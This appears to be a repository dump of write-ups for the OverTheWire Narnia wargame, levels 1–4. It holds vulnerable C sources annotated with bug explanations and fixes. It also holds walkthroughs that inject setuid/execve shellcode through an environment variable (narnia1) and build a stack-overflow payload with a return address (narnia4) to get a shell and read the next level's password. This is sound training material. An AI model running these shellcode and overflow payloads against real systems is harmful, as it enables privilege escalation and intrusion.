28 | > 29 | > This program is distributed in the hope that it will be useful, 30 | > but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | > MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | > GNU General Public License for more details. 33 | > 34 | > You should have received a copy of the GNU General Public License 35 | > along with this program; if not, write to the Free Software 36 | > Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 37 | >*/ 38 | >#include 39 | > 40 | >int main(){ 41 | > int (*ret)(); 42 | > 43 | > if(getenv("EGG")==NULL){ 44 | > printf("Give me something to execute at the env-variable EGG\n"); 45 | > exit(1); 46 | > } 47 | > 48 | > printf("Trying to execute EGG!\n"); 49 | > ret = getenv("EGG"); 50 | > ret(); 51 | > 52 | > return 0; 53 | >} 54 | >``` 55 | > 56 | > This one looks straightforward, but at the same time, I don't quite know how ```getenv("EGG");``` is going to work. What it looks like to someone who isn't the best ```C``` programmer is that we are going to read in the value of the environment variable ```EGG``` and execute whatever is in there. Let's try a basic command and see what it does. 57 | > 58 | >``` 59 | ># export EGG=ls 60 | ># echo $EGG 61 | >ls 62 | ># ./narnia1 63 | >Trying to execute EGG! 64 | >Segmentation fault 65 | >``` 66 | > 67 | > Ok, clearly there is more going on here. Let's bust out our disassembler and see what's going on at the ```getenv("EGG");``` line. 
68 | > 69 | >```asm 70 | > main: 71 | >0804847d push ebp ; XREF=_start+23 72 | >0804847e mov ebp, esp 73 | >08048480 and esp, 0xfffffff0 74 | >08048483 sub esp, 0x20 75 | >08048486 mov dword [ss:esp], 0x8048570 ; argument "name" for method j_getenv 76 | >0804848d call j_getenv 77 | >08048492 test eax, eax 78 | >08048494 jne 0x80484ae 79 | > 80 | >08048496 mov dword [ss:esp], 0x8048574 ; "Give me something to execute at the env-variable EGG", argument "s" for method j_puts 81 | >0804849d call j_puts 82 | >080484a2 mov dword [ss:esp], 0x1 ; argument "status" for method j_exit 83 | >080484a9 call j_exit 84 | > 85 | >080484ae mov dword [ss:esp], 0x80485a9 ; "Trying to execute EGG!", argument "s" for method j_puts, XREF=main+23 86 | >080484b5 call j_puts 87 | >080484ba mov dword [ss:esp], 0x8048570 ; argument "name" for method j_getenv 88 | >080484c1 call j_getenv 89 | >080484c6 mov dword [ss:esp+0x1c], eax 90 | >080484ca mov eax, dword [ss:esp+0x1c] 91 | >080484ce call eax 92 | >080484d0 mov eax, 0x0 93 | >080484d5 leave 94 | >080484d6 ret 95 | >``` 96 | > 97 | > Well, we can see the call to ```j_getenv``` at ```0x080484c1``` and there appears to be call directly after that at ```0x080484ce```. Let's setup gdb and break at that point. 98 | > 99 | >```asm 100 | ># gdb narnia1 101 | >(gdb) display/a $eax 102 | >(gdb) break *0x080484ce 103 | >Breakpoint 1 at 0x80484ce 104 | >(gdb) run 105 | >Starting program: /root/narnia1 106 | >warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 107 | >Trying to execute EGG! 
108 | > 109 | >Breakpoint 1, 0x080484ce in main () 110 | >1: /a $eax = 0xffffd806 111 | >(gdb) x/100x $eax 112 | >0xffffd806: 0x5500736c 0x3d524553 0x746f6f72 0x5f534c00 113 | >0xffffd816: 0x4f4c4f43 0x723d5352 0x3a303d73 0x303d6964 114 | >0xffffd826: 0x34333b31 0x3d6e6c3a 0x333b3130 0x686d3a36 115 | >0xffffd836: 0x3a30303d 0x343d6970 0x33333b30 0x3d6f733a 116 | >0xffffd846: 0x333b3130 0x6f643a35 0x3b31303d 0x623a3533 117 | >0xffffd856: 0x30343d64 0x3b33333b 0x633a3130 0x30343d64 118 | >0xffffd866: 0x3b33333b 0x6f3a3130 0x30343d72 0x3b31333b 119 | >0xffffd876: 0x733a3130 0x37333d75 0x3a31343b 0x333d6773 120 | >0xffffd886: 0x33343b30 0x3d61633a 0x343b3033 0x77743a31 121 | >0xffffd896: 0x3b30333d 0x6f3a3234 0x34333d77 0x3a32343b 122 | >0xffffd8a6: 0x333d7473 0x34343b37 0x3d78653a 0x333b3130 123 | >0xffffd8b6: 0x2e2a3a32 0x3d726174 0x333b3130 0x2e2a3a31 124 | >0xffffd8c6: 0x3d7a6774 0x333b3130 0x2e2a3a31 0x3d6a7261 125 | >0xffffd8d6: 0x333b3130 0x2e2a3a31 0x3d7a6174 0x333b3130 126 | >0xffffd8e6: 0x2e2a3a31 0x3d687a6c 0x333b3130 0x2e2a3a31 127 | >0xffffd8f6: 0x616d7a6c 0x3b31303d 0x2a3a3133 0x7a6c742e 128 | >0xffffd906: 0x3b31303d 0x2a3a3133 0x7a78742e 0x3b31303d 129 | >0xffffd916: 0x2a3a3133 0x70697a2e 0x3b31303d 0x2a3a3133 130 | >0xffffd926: 0x303d7a2e 0x31333b31 0x5a2e2a3a 0x3b31303d 131 | >0xffffd936: 0x2a3a3133 0x3d7a642e 0x333b3130 0x2e2a3a31 132 | >0xffffd946: 0x303d7a67 0x31333b31 0x6c2e2a3a 0x31303d7a 133 | >0xffffd956: 0x3a31333b 0x7a782e2a 0x3b31303d 0x2a3a3133 134 | >0xffffd966: 0x327a622e 0x3b31303d 0x2a3a3133 0x3d7a622e 135 | >0xffffd976: 0x333b3130 0x2e2a3a31 0x3d7a6274 0x333b3130 136 | >0xffffd986: 0x2e2a3a31 0x327a6274 0x3b31303d 0x2a3a3133 137 | >``` 138 | > 139 | > Ah, so it looks like our ```ls``` is at ```0xffffd808``` and ```ffffd809```. At those two addresses we see the values ```0x73``` and ```0x6c``` respectively which translate back to ```s``` and ```l```. 
So it looks like if we load valid shellcode into the ```EGG``` environment variable it should be executed as the ```call``` will basically be pointed to the shellcode itself. I'll just use some shellcode that I got out of exploit-db. 140 | > 141 | >``` 142 | ># cat /usr/share/exploitdb/platforms/lin_x86/shellcode/13333.txt 143 | >-------------------[ASM]---------------------- 144 | > 145 | >global _start 146 | >section .text 147 | >_start: 148 | >;setuid(0) 149 | >xor ebx,ebx 150 | >lea eax,[ebx+17h] 151 | >cdq 152 | >int 80h 153 | >;execve("/bin/sh",0,0) 154 | >xor ecx,ecx 155 | >push ecx 156 | >push 0x68732f6e 157 | >push 0x69622f2f 158 | >lea eax,[ecx+0Bh] 159 | >mov ebx,esp 160 | >int 80h 161 | > 162 | >-------------------[/ASM]---------------------- 163 | > 164 | >-------------------[C]---------------------- 165 | > 166 | >#include 167 | > 168 | >const char shellcode[]= "\x31\xdb" 169 | > "\x8d\x43\x17" 170 | > "\x99" 171 | > "\xcd\x80" 172 | > "\x31\xc9" 173 | > "\x51" 174 | > "\x68\x6e\x2f\x73\x68" 175 | > "\x68\x2f\x2f\x62\x69" 176 | > "\x8d\x41\x0b" 177 | > "\x89\xe3" 178 | > "\xcd\x80"; 179 | > 180 | >int main() 181 | >{ 182 | > printf ("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE" 183 | > "WITHOUT NULLS THAT SPAWNS A SHELL" 184 | > "\n\nCoded by Chema Garcia (aka sch3m4)" 185 | > "\n\t + sch3m4@opensec.es" 186 | > "\n\t + http://opensec.es" 187 | > "\n\n[+] Date: 29/11/2008" 188 | > "\n[+] Thanks to: vlan7" 189 | > "\n\n[+] Shellcode Size: %d bytes\n\n", 190 | > sizeof(shellcode)-1); 191 | > 192 | > (*(void (*)()) shellcode)(); 193 | > 194 | > return 0; 195 | >} 196 | > 197 | >-------------------[C]---------------------- 198 | > 199 | ># milw0rm.com [2008-11-13] 200 | >``` 201 | > 202 | > Now for the delivery. We can't just type out the shellcode into the environment variable, so like narnia0 we'll turn to python. To do this we will just nest the command so that it will execute and print the appropriate values into the environment variable. 
203 | > 204 | >``` 205 | ># export EGG=$(python -c 'print "\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"') 206 | ># echo $EGG 207 | >1ۍC�̀1�Qhn/shh//bi�A 208 | > ��̀ 209 | >``` 210 | > 211 | > That looks about right, let's move to the server and run it. 212 | > 213 | >``` 214 | >narnia1@melinda:/narnia$ export EGG=$(python -c 'print "\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"') 215 | >narnia1@melinda:/narnia$ ./narnia1 216 | >Trying to execute EGG! 217 | >$ whoami 218 | >narnia2 219 | >$ cat /etc/narnia_pass/narnia2 220 | >********** 221 | >$ 222 | >``` 223 | > 224 | > On to narnia2. 225 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia1/narnia1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia1/narnia1 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia1/narnia1.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 
11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | /* narnia1: treats the text of the EGG environment variable as code. The header name after #include appears to have been lost when this page was rendered. */ 18 | int main(){ 19 | int (*ret)(); /* function pointer that is later aimed at environment data */ 20 | 21 | if(getenv("EGG")==NULL){ 22 | printf("Give me something to execute at the env-variable EGG\n"); 23 | exit(1); 24 | } 25 | 26 | printf("Trying to execute EGG!\n"); 27 | ret = getenv("EGG"); /* BUG: getenv returns a char * into the process environment — caller-controlled data, not code; storing it in a function pointer is a type mismatch a compiler should warn about (second getenv call, no validation of the value) */ 28 | ret(); /* jumps into the environment string, so whatever bytes EGG holds run inside this process. A program that must run something named by the environment should pass a path to exec() or posix_spawn(), never call into the string itself. */ 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia2/narnia2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia2/narnia2 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia2/narnia2.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 
11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | /* narnia2: echo the first argument back through a fixed-size stack buffer. The header names after #include appear to have been lost when this page was rendered. */ 20 | int main(int argc, char * argv[]){ 21 | char buf[128]; /* fixed-size copy target */ 22 | 23 | if(argc == 1){ 24 | printf("Usage: %s argument\n", argv[0]); 25 | exit(1); 26 | } 27 | strcpy(buf,argv[1]); /* BUG: no bound — an argument of 128 bytes or more overruns buf (strcpy copies the NUL as well). snprintf(buf, sizeof buf, "%s", argv[1]) or an explicit strlen check keeps the copy in bounds. */ 28 | printf("%s", buf); /* literal format string, so the user data is printed rather than interpreted */ 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia3/narnia3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia3/narnia3 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia3/narnia3.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 
11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | /* narnia3: copy up to 31 bytes of the file named by argv[1] into the path held in ofile. The header names after #include appear to have been lost when this page was rendered. */ 24 | int main(int argc, char **argv){ 25 | 26 | int ifd, ofd; 27 | char ofile[16] = "/dev/null"; /* output path, declared directly before ifile */ 28 | char ifile[32]; 29 | char buf[32]; /* never initialised; read() below may fill only part of it */ 30 | 31 | if(argc != 2){ 32 | printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]); 33 | exit(-1); 34 | } 35 | 36 | /* open files */ 37 | strcpy(ifile, argv[1]); /* BUG: unbounded copy into a 32-byte array; a longer argv[1] runs past ifile. Whether the overrun reaches ofile, and so changes where the data is written below, depends on how the compiler laid out the locals. A length check or snprintf(ifile, sizeof ifile, "%s", argv[1]) is the fix. */ 38 | if((ofd = open(ofile,O_RDWR)) < 0 ){ /* opens whatever ofile names at this point */ 39 | printf("error opening %s\n", ofile); 40 | exit(-1); 41 | } 42 | if((ifd = open(ifile, O_RDONLY)) < 0 ){ 43 | printf("error opening %s\n", ifile); 44 | exit(-1); 45 | } 46 | 47 | /* copy from file1 to file2 */ 48 | read(ifd, buf, sizeof(buf)-1); /* return value ignored: on a short read or error the rest of buf stays uninitialised */ 49 | write(ofd,buf, sizeof(buf)-1); /* always writes 31 bytes, including any bytes read() did not fill; return value ignored */ 50 | printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile); 51 | 52 | /* close 'em */ 53 | close(ifd); 54 | close(ofd); 55 | 56 | exit(1); /* non-zero status even on the success path */ 57 | } 58 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia4/Readme.md: -------------------------------------------------------------------------------- 1 | #Narnia4 2 | 3 | narnia.labs.overthewire.org 4 | 5 | **Username:** narnia4 6 | **Password:** see [narnia3](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria3) 7 | **Description:** 8 | > This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game and we've tried to make them easy to exploit. You'll get the source code of each level to make it easier for you to spot the vuln and abuse it. 9 | 10 | ##Write-up 11 | 12 | > Let's start out like we normally do and execute the application. 
13 | > 14 | >``` 15 | # ./narnia4 16 | # ./narnia4 Test 17 | # 18 | >``` 19 | > 20 | > Well that's weird. Let's see what we can gather from the source. 21 | > 22 | >```C 23 | /* 24 | This program is free software; you can redistribute it and/or modify 25 | it under the terms of the GNU General Public License as published by 26 | the Free Software Foundation; either version 2 of the License, or 27 | (at your option) any later version. 28 | > 29 | This program is distributed in the hope that it will be useful, 30 | but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | GNU General Public License for more details. 33 | > 34 | You should have received a copy of the GNU General Public License 35 | along with this program; if not, write to the Free Software 36 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 37 | */ 38 | > 39 | #include 40 | #include 41 | #include 42 | #include 43 | > 44 | extern char **environ; 45 | > 46 | int main(int argc,char **argv){ 47 | int i; 48 | char buffer[256]; 49 | > 50 | for(i = 0; environ[i] != NULL; i++) 51 | memset(environ[i], '\0', strlen(environ[i])); 52 | > 53 | if(argc>1) 54 | strcpy(buffer,argv[1]); 55 | > 56 | return 0; 57 | } 58 | >``` 59 | > 60 | > Ok, similar to previous challenges we can see the character array ```char buffer[256];``` declared and then used in ```strcpy(buffer,argv[1]);``` without checking the size of ```argv[1]```. Let's go ahead and start up gdb and poke around. 
61 | > 62 | >``` 63 | (gdb) run $(python -c 'print "A"*100') 64 | Starting program: /root/narnia4 $(python -c 'print "A"*100') 65 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 66 | [Inferior 1 (process 6557) exited normally] 67 | (gdb) run $(python -c 'print "A"*200') 68 | Starting program: /root/narnia4 $(python -c 'print "A"*200') 69 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 70 | [Inferior 1 (process 6560) exited normally] 71 | (gdb) run $(python -c 'print "A"*300') 72 | Starting program: /root/narnia4 $(python -c 'print "A"*300') 73 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 74 | > 75 | Program received signal SIGSEGV, Segmentation fault. 76 | 0x41414141 in ?? () 77 | (gdb) c 78 | Continuing. 79 | > 80 | Program terminated with signal SIGSEGV, Segmentation fault. 81 | The program no longer exists. 82 | (gdb) run $(python -c 'print "A"*275') 83 | Starting program: /root/narnia4 $(python -c 'print "A"*275') 84 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 85 | > 86 | Program received signal SIGSEGV, Segmentation fault. 87 | 0x00414141 in ?? () 88 | (gdb) c 89 | Continuing. 90 | > 91 | Program terminated with signal SIGSEGV, Segmentation fault. 92 | The program no longer exists. 93 | (gdb) run $(python -c 'print "A"*276') 94 | Starting program: /root/narnia4 $(python -c 'print "A"*276') 95 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 96 | > 97 | Program received signal SIGSEGV, Segmentation fault. 98 | 0x41414141 in ?? () 99 | >``` 100 | > 101 | > Ok, we saw our ```A``` when we submitted 300 of them. After backing off to 275, we see 3 positions overwritten with ```A```. Adding one to that looks like we have our magic number as it appears we have overwritten a return address successfully with ```0x41414141``` with 276 ```A```. 
102 | > 103 | > Let's see if we can pinpoint a location for our 28 byte shellcode and an address to return back to. 104 | > 105 | >```asm 106 | (gdb) run $(python -c 'print "A"*244+"R"*28+"A"*4') 107 | Starting program: /root/narnia4 $(python -c 'print "A"*244+"R"*28+"A"*4') 108 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 109 | > 110 | Program received signal SIGSEGV, Segmentation fault. 111 | 0x41414141 in ?? () 112 | (gdb) x/300x $esp 113 | 0xffffd400: 0x00000000 0xffffd4a4 0xffffd4b0 0xf7fdb860 114 | 0xffffd410: 0xf7ff4821 0xffffffff 0xf7ffcff4 0x0804828b 115 | 0xffffd420: 0x00000001 0xffffd460 0xf7fedc16 0xf7ffdac0 116 | 0xffffd430: 0xf7fdbb58 0xf7fb6ff4 0x00000000 0x00000000 117 | 0xffffd440: 0xffffd478 0x6a7d42c1 0x586954d1 0x00000000 118 | 0xffffd450: 0x00000000 0x00000000 0x00000002 0x080483b0 119 | 0xffffd460: 0x00000000 0xf7ff39c0 0xf7e6dd6b 0xf7ffcff4 120 | 0xffffd470: 0x00000002 0x080483b0 0x00000000 0x080483d1 121 | 0xffffd480: 0x080484ad 0x00000002 0xffffd4a4 0x08048550 122 | 0xffffd490: 0x080485c0 0xf7fee590 0xffffd49c 0xf7ffd908 123 | 0xffffd4a0: 0x00000002 0xffffd5f3 0xffffd601 0x00000000 124 | 0xffffd4b0: 0xffffd716 0xffffd729 0xffffd75c 0xffffd767 125 | 0xffffd4c0: 0xffffd777 0xffffd7c5 0xffffd7d7 0xffffd809 126 | 0xffffd4d0: 0xffffd813 0xffffdd34 0xffffdd62 0xffffddb0 127 | 0xffffd4e0: 0xffffddbe 0xffffddc9 0xffffdde1 0xffffde23 128 | 0xffffd4f0: 0xffffde32 0xffffde3c 0xffffde4d 0xffffde64 129 | 0xffffd500: 0xffffde79 0xffffde82 0xffffde95 0xffffdea0 130 | 0xffffd510: 0xffffdea8 0xffffded4 0xffffdee1 0xffffdf43 131 | 0xffffd520: 0xffffdf80 0xffffdf8d 0xffffdf9a 0xffffdfb3 132 | 0xffffd530: 0x00000000 0x00000020 0xf7fded00 0x00000021 133 | 0xffffd540: 0xf7fde000 0x00000010 0x0fabfbff 0x00000006 134 | 0xffffd550: 0x00001000 0x00000011 0x00000064 0x00000003 135 | 0xffffd560: 0x08048034 0x00000004 0x00000020 0x00000005 136 | 0xffffd570: 0x00000008 0x00000007 0xf7fe0000 0x00000008 137 | 0xffffd580: 
0x00000000 0x00000009 0x080483b0 0x0000000b 138 | 0xffffd590: 0x00000000 0x0000000c 0x00000000 0x0000000d 139 | 0xffffd5a0: 0x00000000 0x0000000e 0x00000000 0x00000017 140 | 0xffffd5b0: 0x00000000 0x00000019 0xffffd5db 0x0000001f 141 | 0xffffd5c0: 0xffffdfea 0x0000000f 0xffffd5eb 0x00000000 142 | 0xffffd5d0: 0x00000000 0x00000000 0x0d000000 0xa1628788 143 | 0xffffd5e0: 0x159f4aea 0x401aef6a 0x691a76d9 0x00363836 144 | 0xffffd5f0: 0x2f000000 0x746f6f72 0x72616e2f 0x3461696e 145 | 0xffffd600: 0x41414100 0x41414141 0x41414141 0x41414141 146 | 0xffffd610: 0x41414141 0x41414141 0x41414141 0x41414141 147 | 0xffffd620: 0x41414141 0x41414141 0x41414141 0x41414141 148 | 0xffffd630: 0x41414141 0x41414141 0x41414141 0x41414141 149 | 0xffffd640: 0x41414141 0x41414141 0x41414141 0x41414141 150 | 0xffffd650: 0x41414141 0x41414141 0x41414141 0x41414141 151 | 0xffffd660: 0x41414141 0x41414141 0x41414141 0x41414141 152 | 0xffffd670: 0x41414141 0x41414141 0x41414141 0x41414141 153 | 0xffffd680: 0x41414141 0x41414141 0x41414141 0x41414141 154 | 0xffffd690: 0x41414141 0x41414141 0x41414141 0x41414141 155 | 0xffffd6a0: 0x41414141 0x41414141 0x41414141 0x41414141 156 | 0xffffd6b0: 0x41414141 0x41414141 0x41414141 0x41414141 157 | 0xffffd6c0: 0x41414141 0x41414141 0x41414141 0x41414141 158 | 0xffffd6d0: 0x41414141 0x41414141 0x41414141 0x41414141 159 | 0xffffd6e0: 0x41414141 0x41414141 0x41414141 0x41414141 160 | 0xffffd6f0: 0x41414141 0x52525241 0x52525252 0x52525252 161 | 0xffffd700: 0x52525252 0x52525252 0x52525252 0x52525252 162 | 0xffffd710: 0x41414152 0x00000041 0x00000000 0x00000000 163 | >``` 164 | > 165 | > Ok, so it looks like we can return back to ```0xffffd6f4``` and put our shellcode there. Let's try it. 
166 | > 167 | >``` 168 | (gdb) run $(python -c 'print "A"*244+"\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"+"\xf4\xd6\xff\xff"') 169 | Starting program: /root/narnia4 $(python -c 'print "A"*244+"\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"+"\xf4\xd6\xff\xff"') 170 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 171 | process 6592 is executing new program: /bin/dash 172 | warning: Selected architecture i386:x86-64 is not compatible with reported target architecture i386 173 | Architecture of file not recognized. 174 | >``` 175 | > 176 | > We've seen this before. It looks like everything is working locally (just the wrong architecture for the shellcode). Let's move to the server and see if we need to remap anything. 177 | > 178 | >```asm 179 | narnia4@melinda:/narnia$ gdb narnia4 180 | (gdb) run $(python -c 'print "A"*244+"R"*28+"A"*4') 181 | Starting program: /games/narnia/narnia4 $(python -c 'print "A"*244+"R"*28+"A"*4') 182 | > 183 | Program received signal SIGSEGV, Segmentation fault. 184 | 0x41414141 in ?? 
() 185 | (gdb) x/300x $esp 186 | 0xffffd5d0: 0x00000000 0xffffd664 0xffffd670 0xf7feacea 187 | 0xffffd5e0: 0x00000002 0xffffd664 0xffffd604 0x080497cc 188 | 0xffffd5f0: 0x0804825c 0xf7fca000 0x00000000 0x00000000 189 | 0xffffd600: 0x00000000 0xd35f81d1 0xeb6065c1 0x00000000 190 | 0xffffd610: 0x00000000 0x00000000 0x00000002 0x080483b0 191 | 0xffffd620: 0x00000000 0xf7ff0500 0xf7e3c979 0xf7ffd000 192 | 0xffffd630: 0x00000002 0x080483b0 0x00000000 0x080483d1 193 | 0xffffd640: 0x080484ad 0x00000002 0xffffd664 0x08048550 194 | 0xffffd650: 0x080485c0 0xf7feb180 0xffffd65c 0x0000001c 195 | 0xffffd660: 0x00000002 0xffffd79b 0xffffd7b1 0x00000000 196 | 0xffffd670: 0xffffd8c6 0xffffd8db 0xffffd8eb 0xffffd8f6 197 | 0xffffd680: 0xffffd916 0xffffd92a 0xffffd933 0xffffd940 198 | 0xffffd690: 0xffffde61 0xffffde6c 0xffffde78 0xffffded6 199 | 0xffffd6a0: 0xffffdeed 0xffffdefc 0xffffdf08 0xffffdf19 200 | 0xffffd6b0: 0xffffdf22 0xffffdf35 0xffffdf3d 0xffffdf4d 201 | 0xffffd6c0: 0xffffdf80 0xffffdfa0 0xffffdfc0 0x00000000 202 | 0xffffd6d0: 0x00000020 0xf7fdbb20 0x00000021 0xf7fdb000 203 | 0xffffd6e0: 0x00000010 0x1f898b75 0x00000006 0x00001000 204 | 0xffffd6f0: 0x00000011 0x00000064 0x00000003 0x08048034 205 | 0xffffd700: 0x00000004 0x00000020 0x00000005 0x00000008 206 | 0xffffd710: 0x00000007 0xf7fdc000 0x00000008 0x00000000 207 | 0xffffd720: 0x00000009 0x080483b0 0x0000000b 0x000036b4 208 | 0xffffd730: 0x0000000c 0x000036b4 0x0000000d 0x000036b4 209 | 0xffffd740: 0x0000000e 0x000036b4 0x00000017 0x00000000 210 | 0xffffd750: 0x00000019 0xffffd77b 0x0000001f 0xffffdfe2 211 | 0xffffd760: 0x0000000f 0xffffd78b 0x00000000 0x00000000 212 | 0xffffd770: 0x00000000 0x00000000 0x5d000000 0x1086f177 213 | 0xffffd780: 0xbf17167a 0x902c70f3 0x69509589 0x00363836 214 | 0xffffd790: 0x00000000 0x00000000 0x2f000000 0x656d6167 215 | 0xffffd7a0: 0x616e2f73 0x61696e72 0x72616e2f 0x3461696e 216 | 0xffffd7b0: 0x41414100 0x41414141 0x41414141 0x41414141 217 | 0xffffd7c0: 0x41414141 0x41414141 0x41414141 
0x41414141 218 | 0xffffd7d0: 0x41414141 0x41414141 0x41414141 0x41414141 219 | 0xffffd7e0: 0x41414141 0x41414141 0x41414141 0x41414141 220 | 0xffffd7f0: 0x41414141 0x41414141 0x41414141 0x41414141 221 | 0xffffd800: 0x41414141 0x41414141 0x41414141 0x41414141 222 | 0xffffd810: 0x41414141 0x41414141 0x41414141 0x41414141 223 | 0xffffd820: 0x41414141 0x41414141 0x41414141 0x41414141 224 | 0xffffd830: 0x41414141 0x41414141 0x41414141 0x41414141 225 | 0xffffd840: 0x41414141 0x41414141 0x41414141 0x41414141 226 | 0xffffd850: 0x41414141 0x41414141 0x41414141 0x41414141 227 | 0xffffd860: 0x41414141 0x41414141 0x41414141 0x41414141 228 | 0xffffd870: 0x41414141 0x41414141 0x41414141 0x41414141 229 | 0xffffd880: 0x41414141 0x41414141 0x41414141 0x41414141 230 | 0xffffd890: 0x41414141 0x41414141 0x41414141 0x41414141 231 | 0xffffd8a0: 0x41414141 0x52525241 0x52525252 0x52525252 232 | 0xffffd8b0: 0x52525252 0x52525252 0x52525252 0x52525252 233 | 0xffffd8c0: 0x41414152 0x00000041 0x00000000 0x00000000 234 | >``` 235 | > 236 | > Looks like we need to update our return address to ```0xffffd8a4```. 237 | > 238 | >``` 239 | narnia4@melinda:/narnia$ ./narnia4 $(python -c 'print "A"*244+"\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"+"\xa4\xd8\xff\xff"') 240 | $ whoami 241 | narnia5 242 | $ cat /etc/narnia_pass/narnia5 243 | ********** 244 | $ 245 | >``` 246 | > 247 | > Well that one seemed easier. Let's head to narnia5. 
248 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia4/narnia4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia4/narnia4 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia4/narnia4.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 
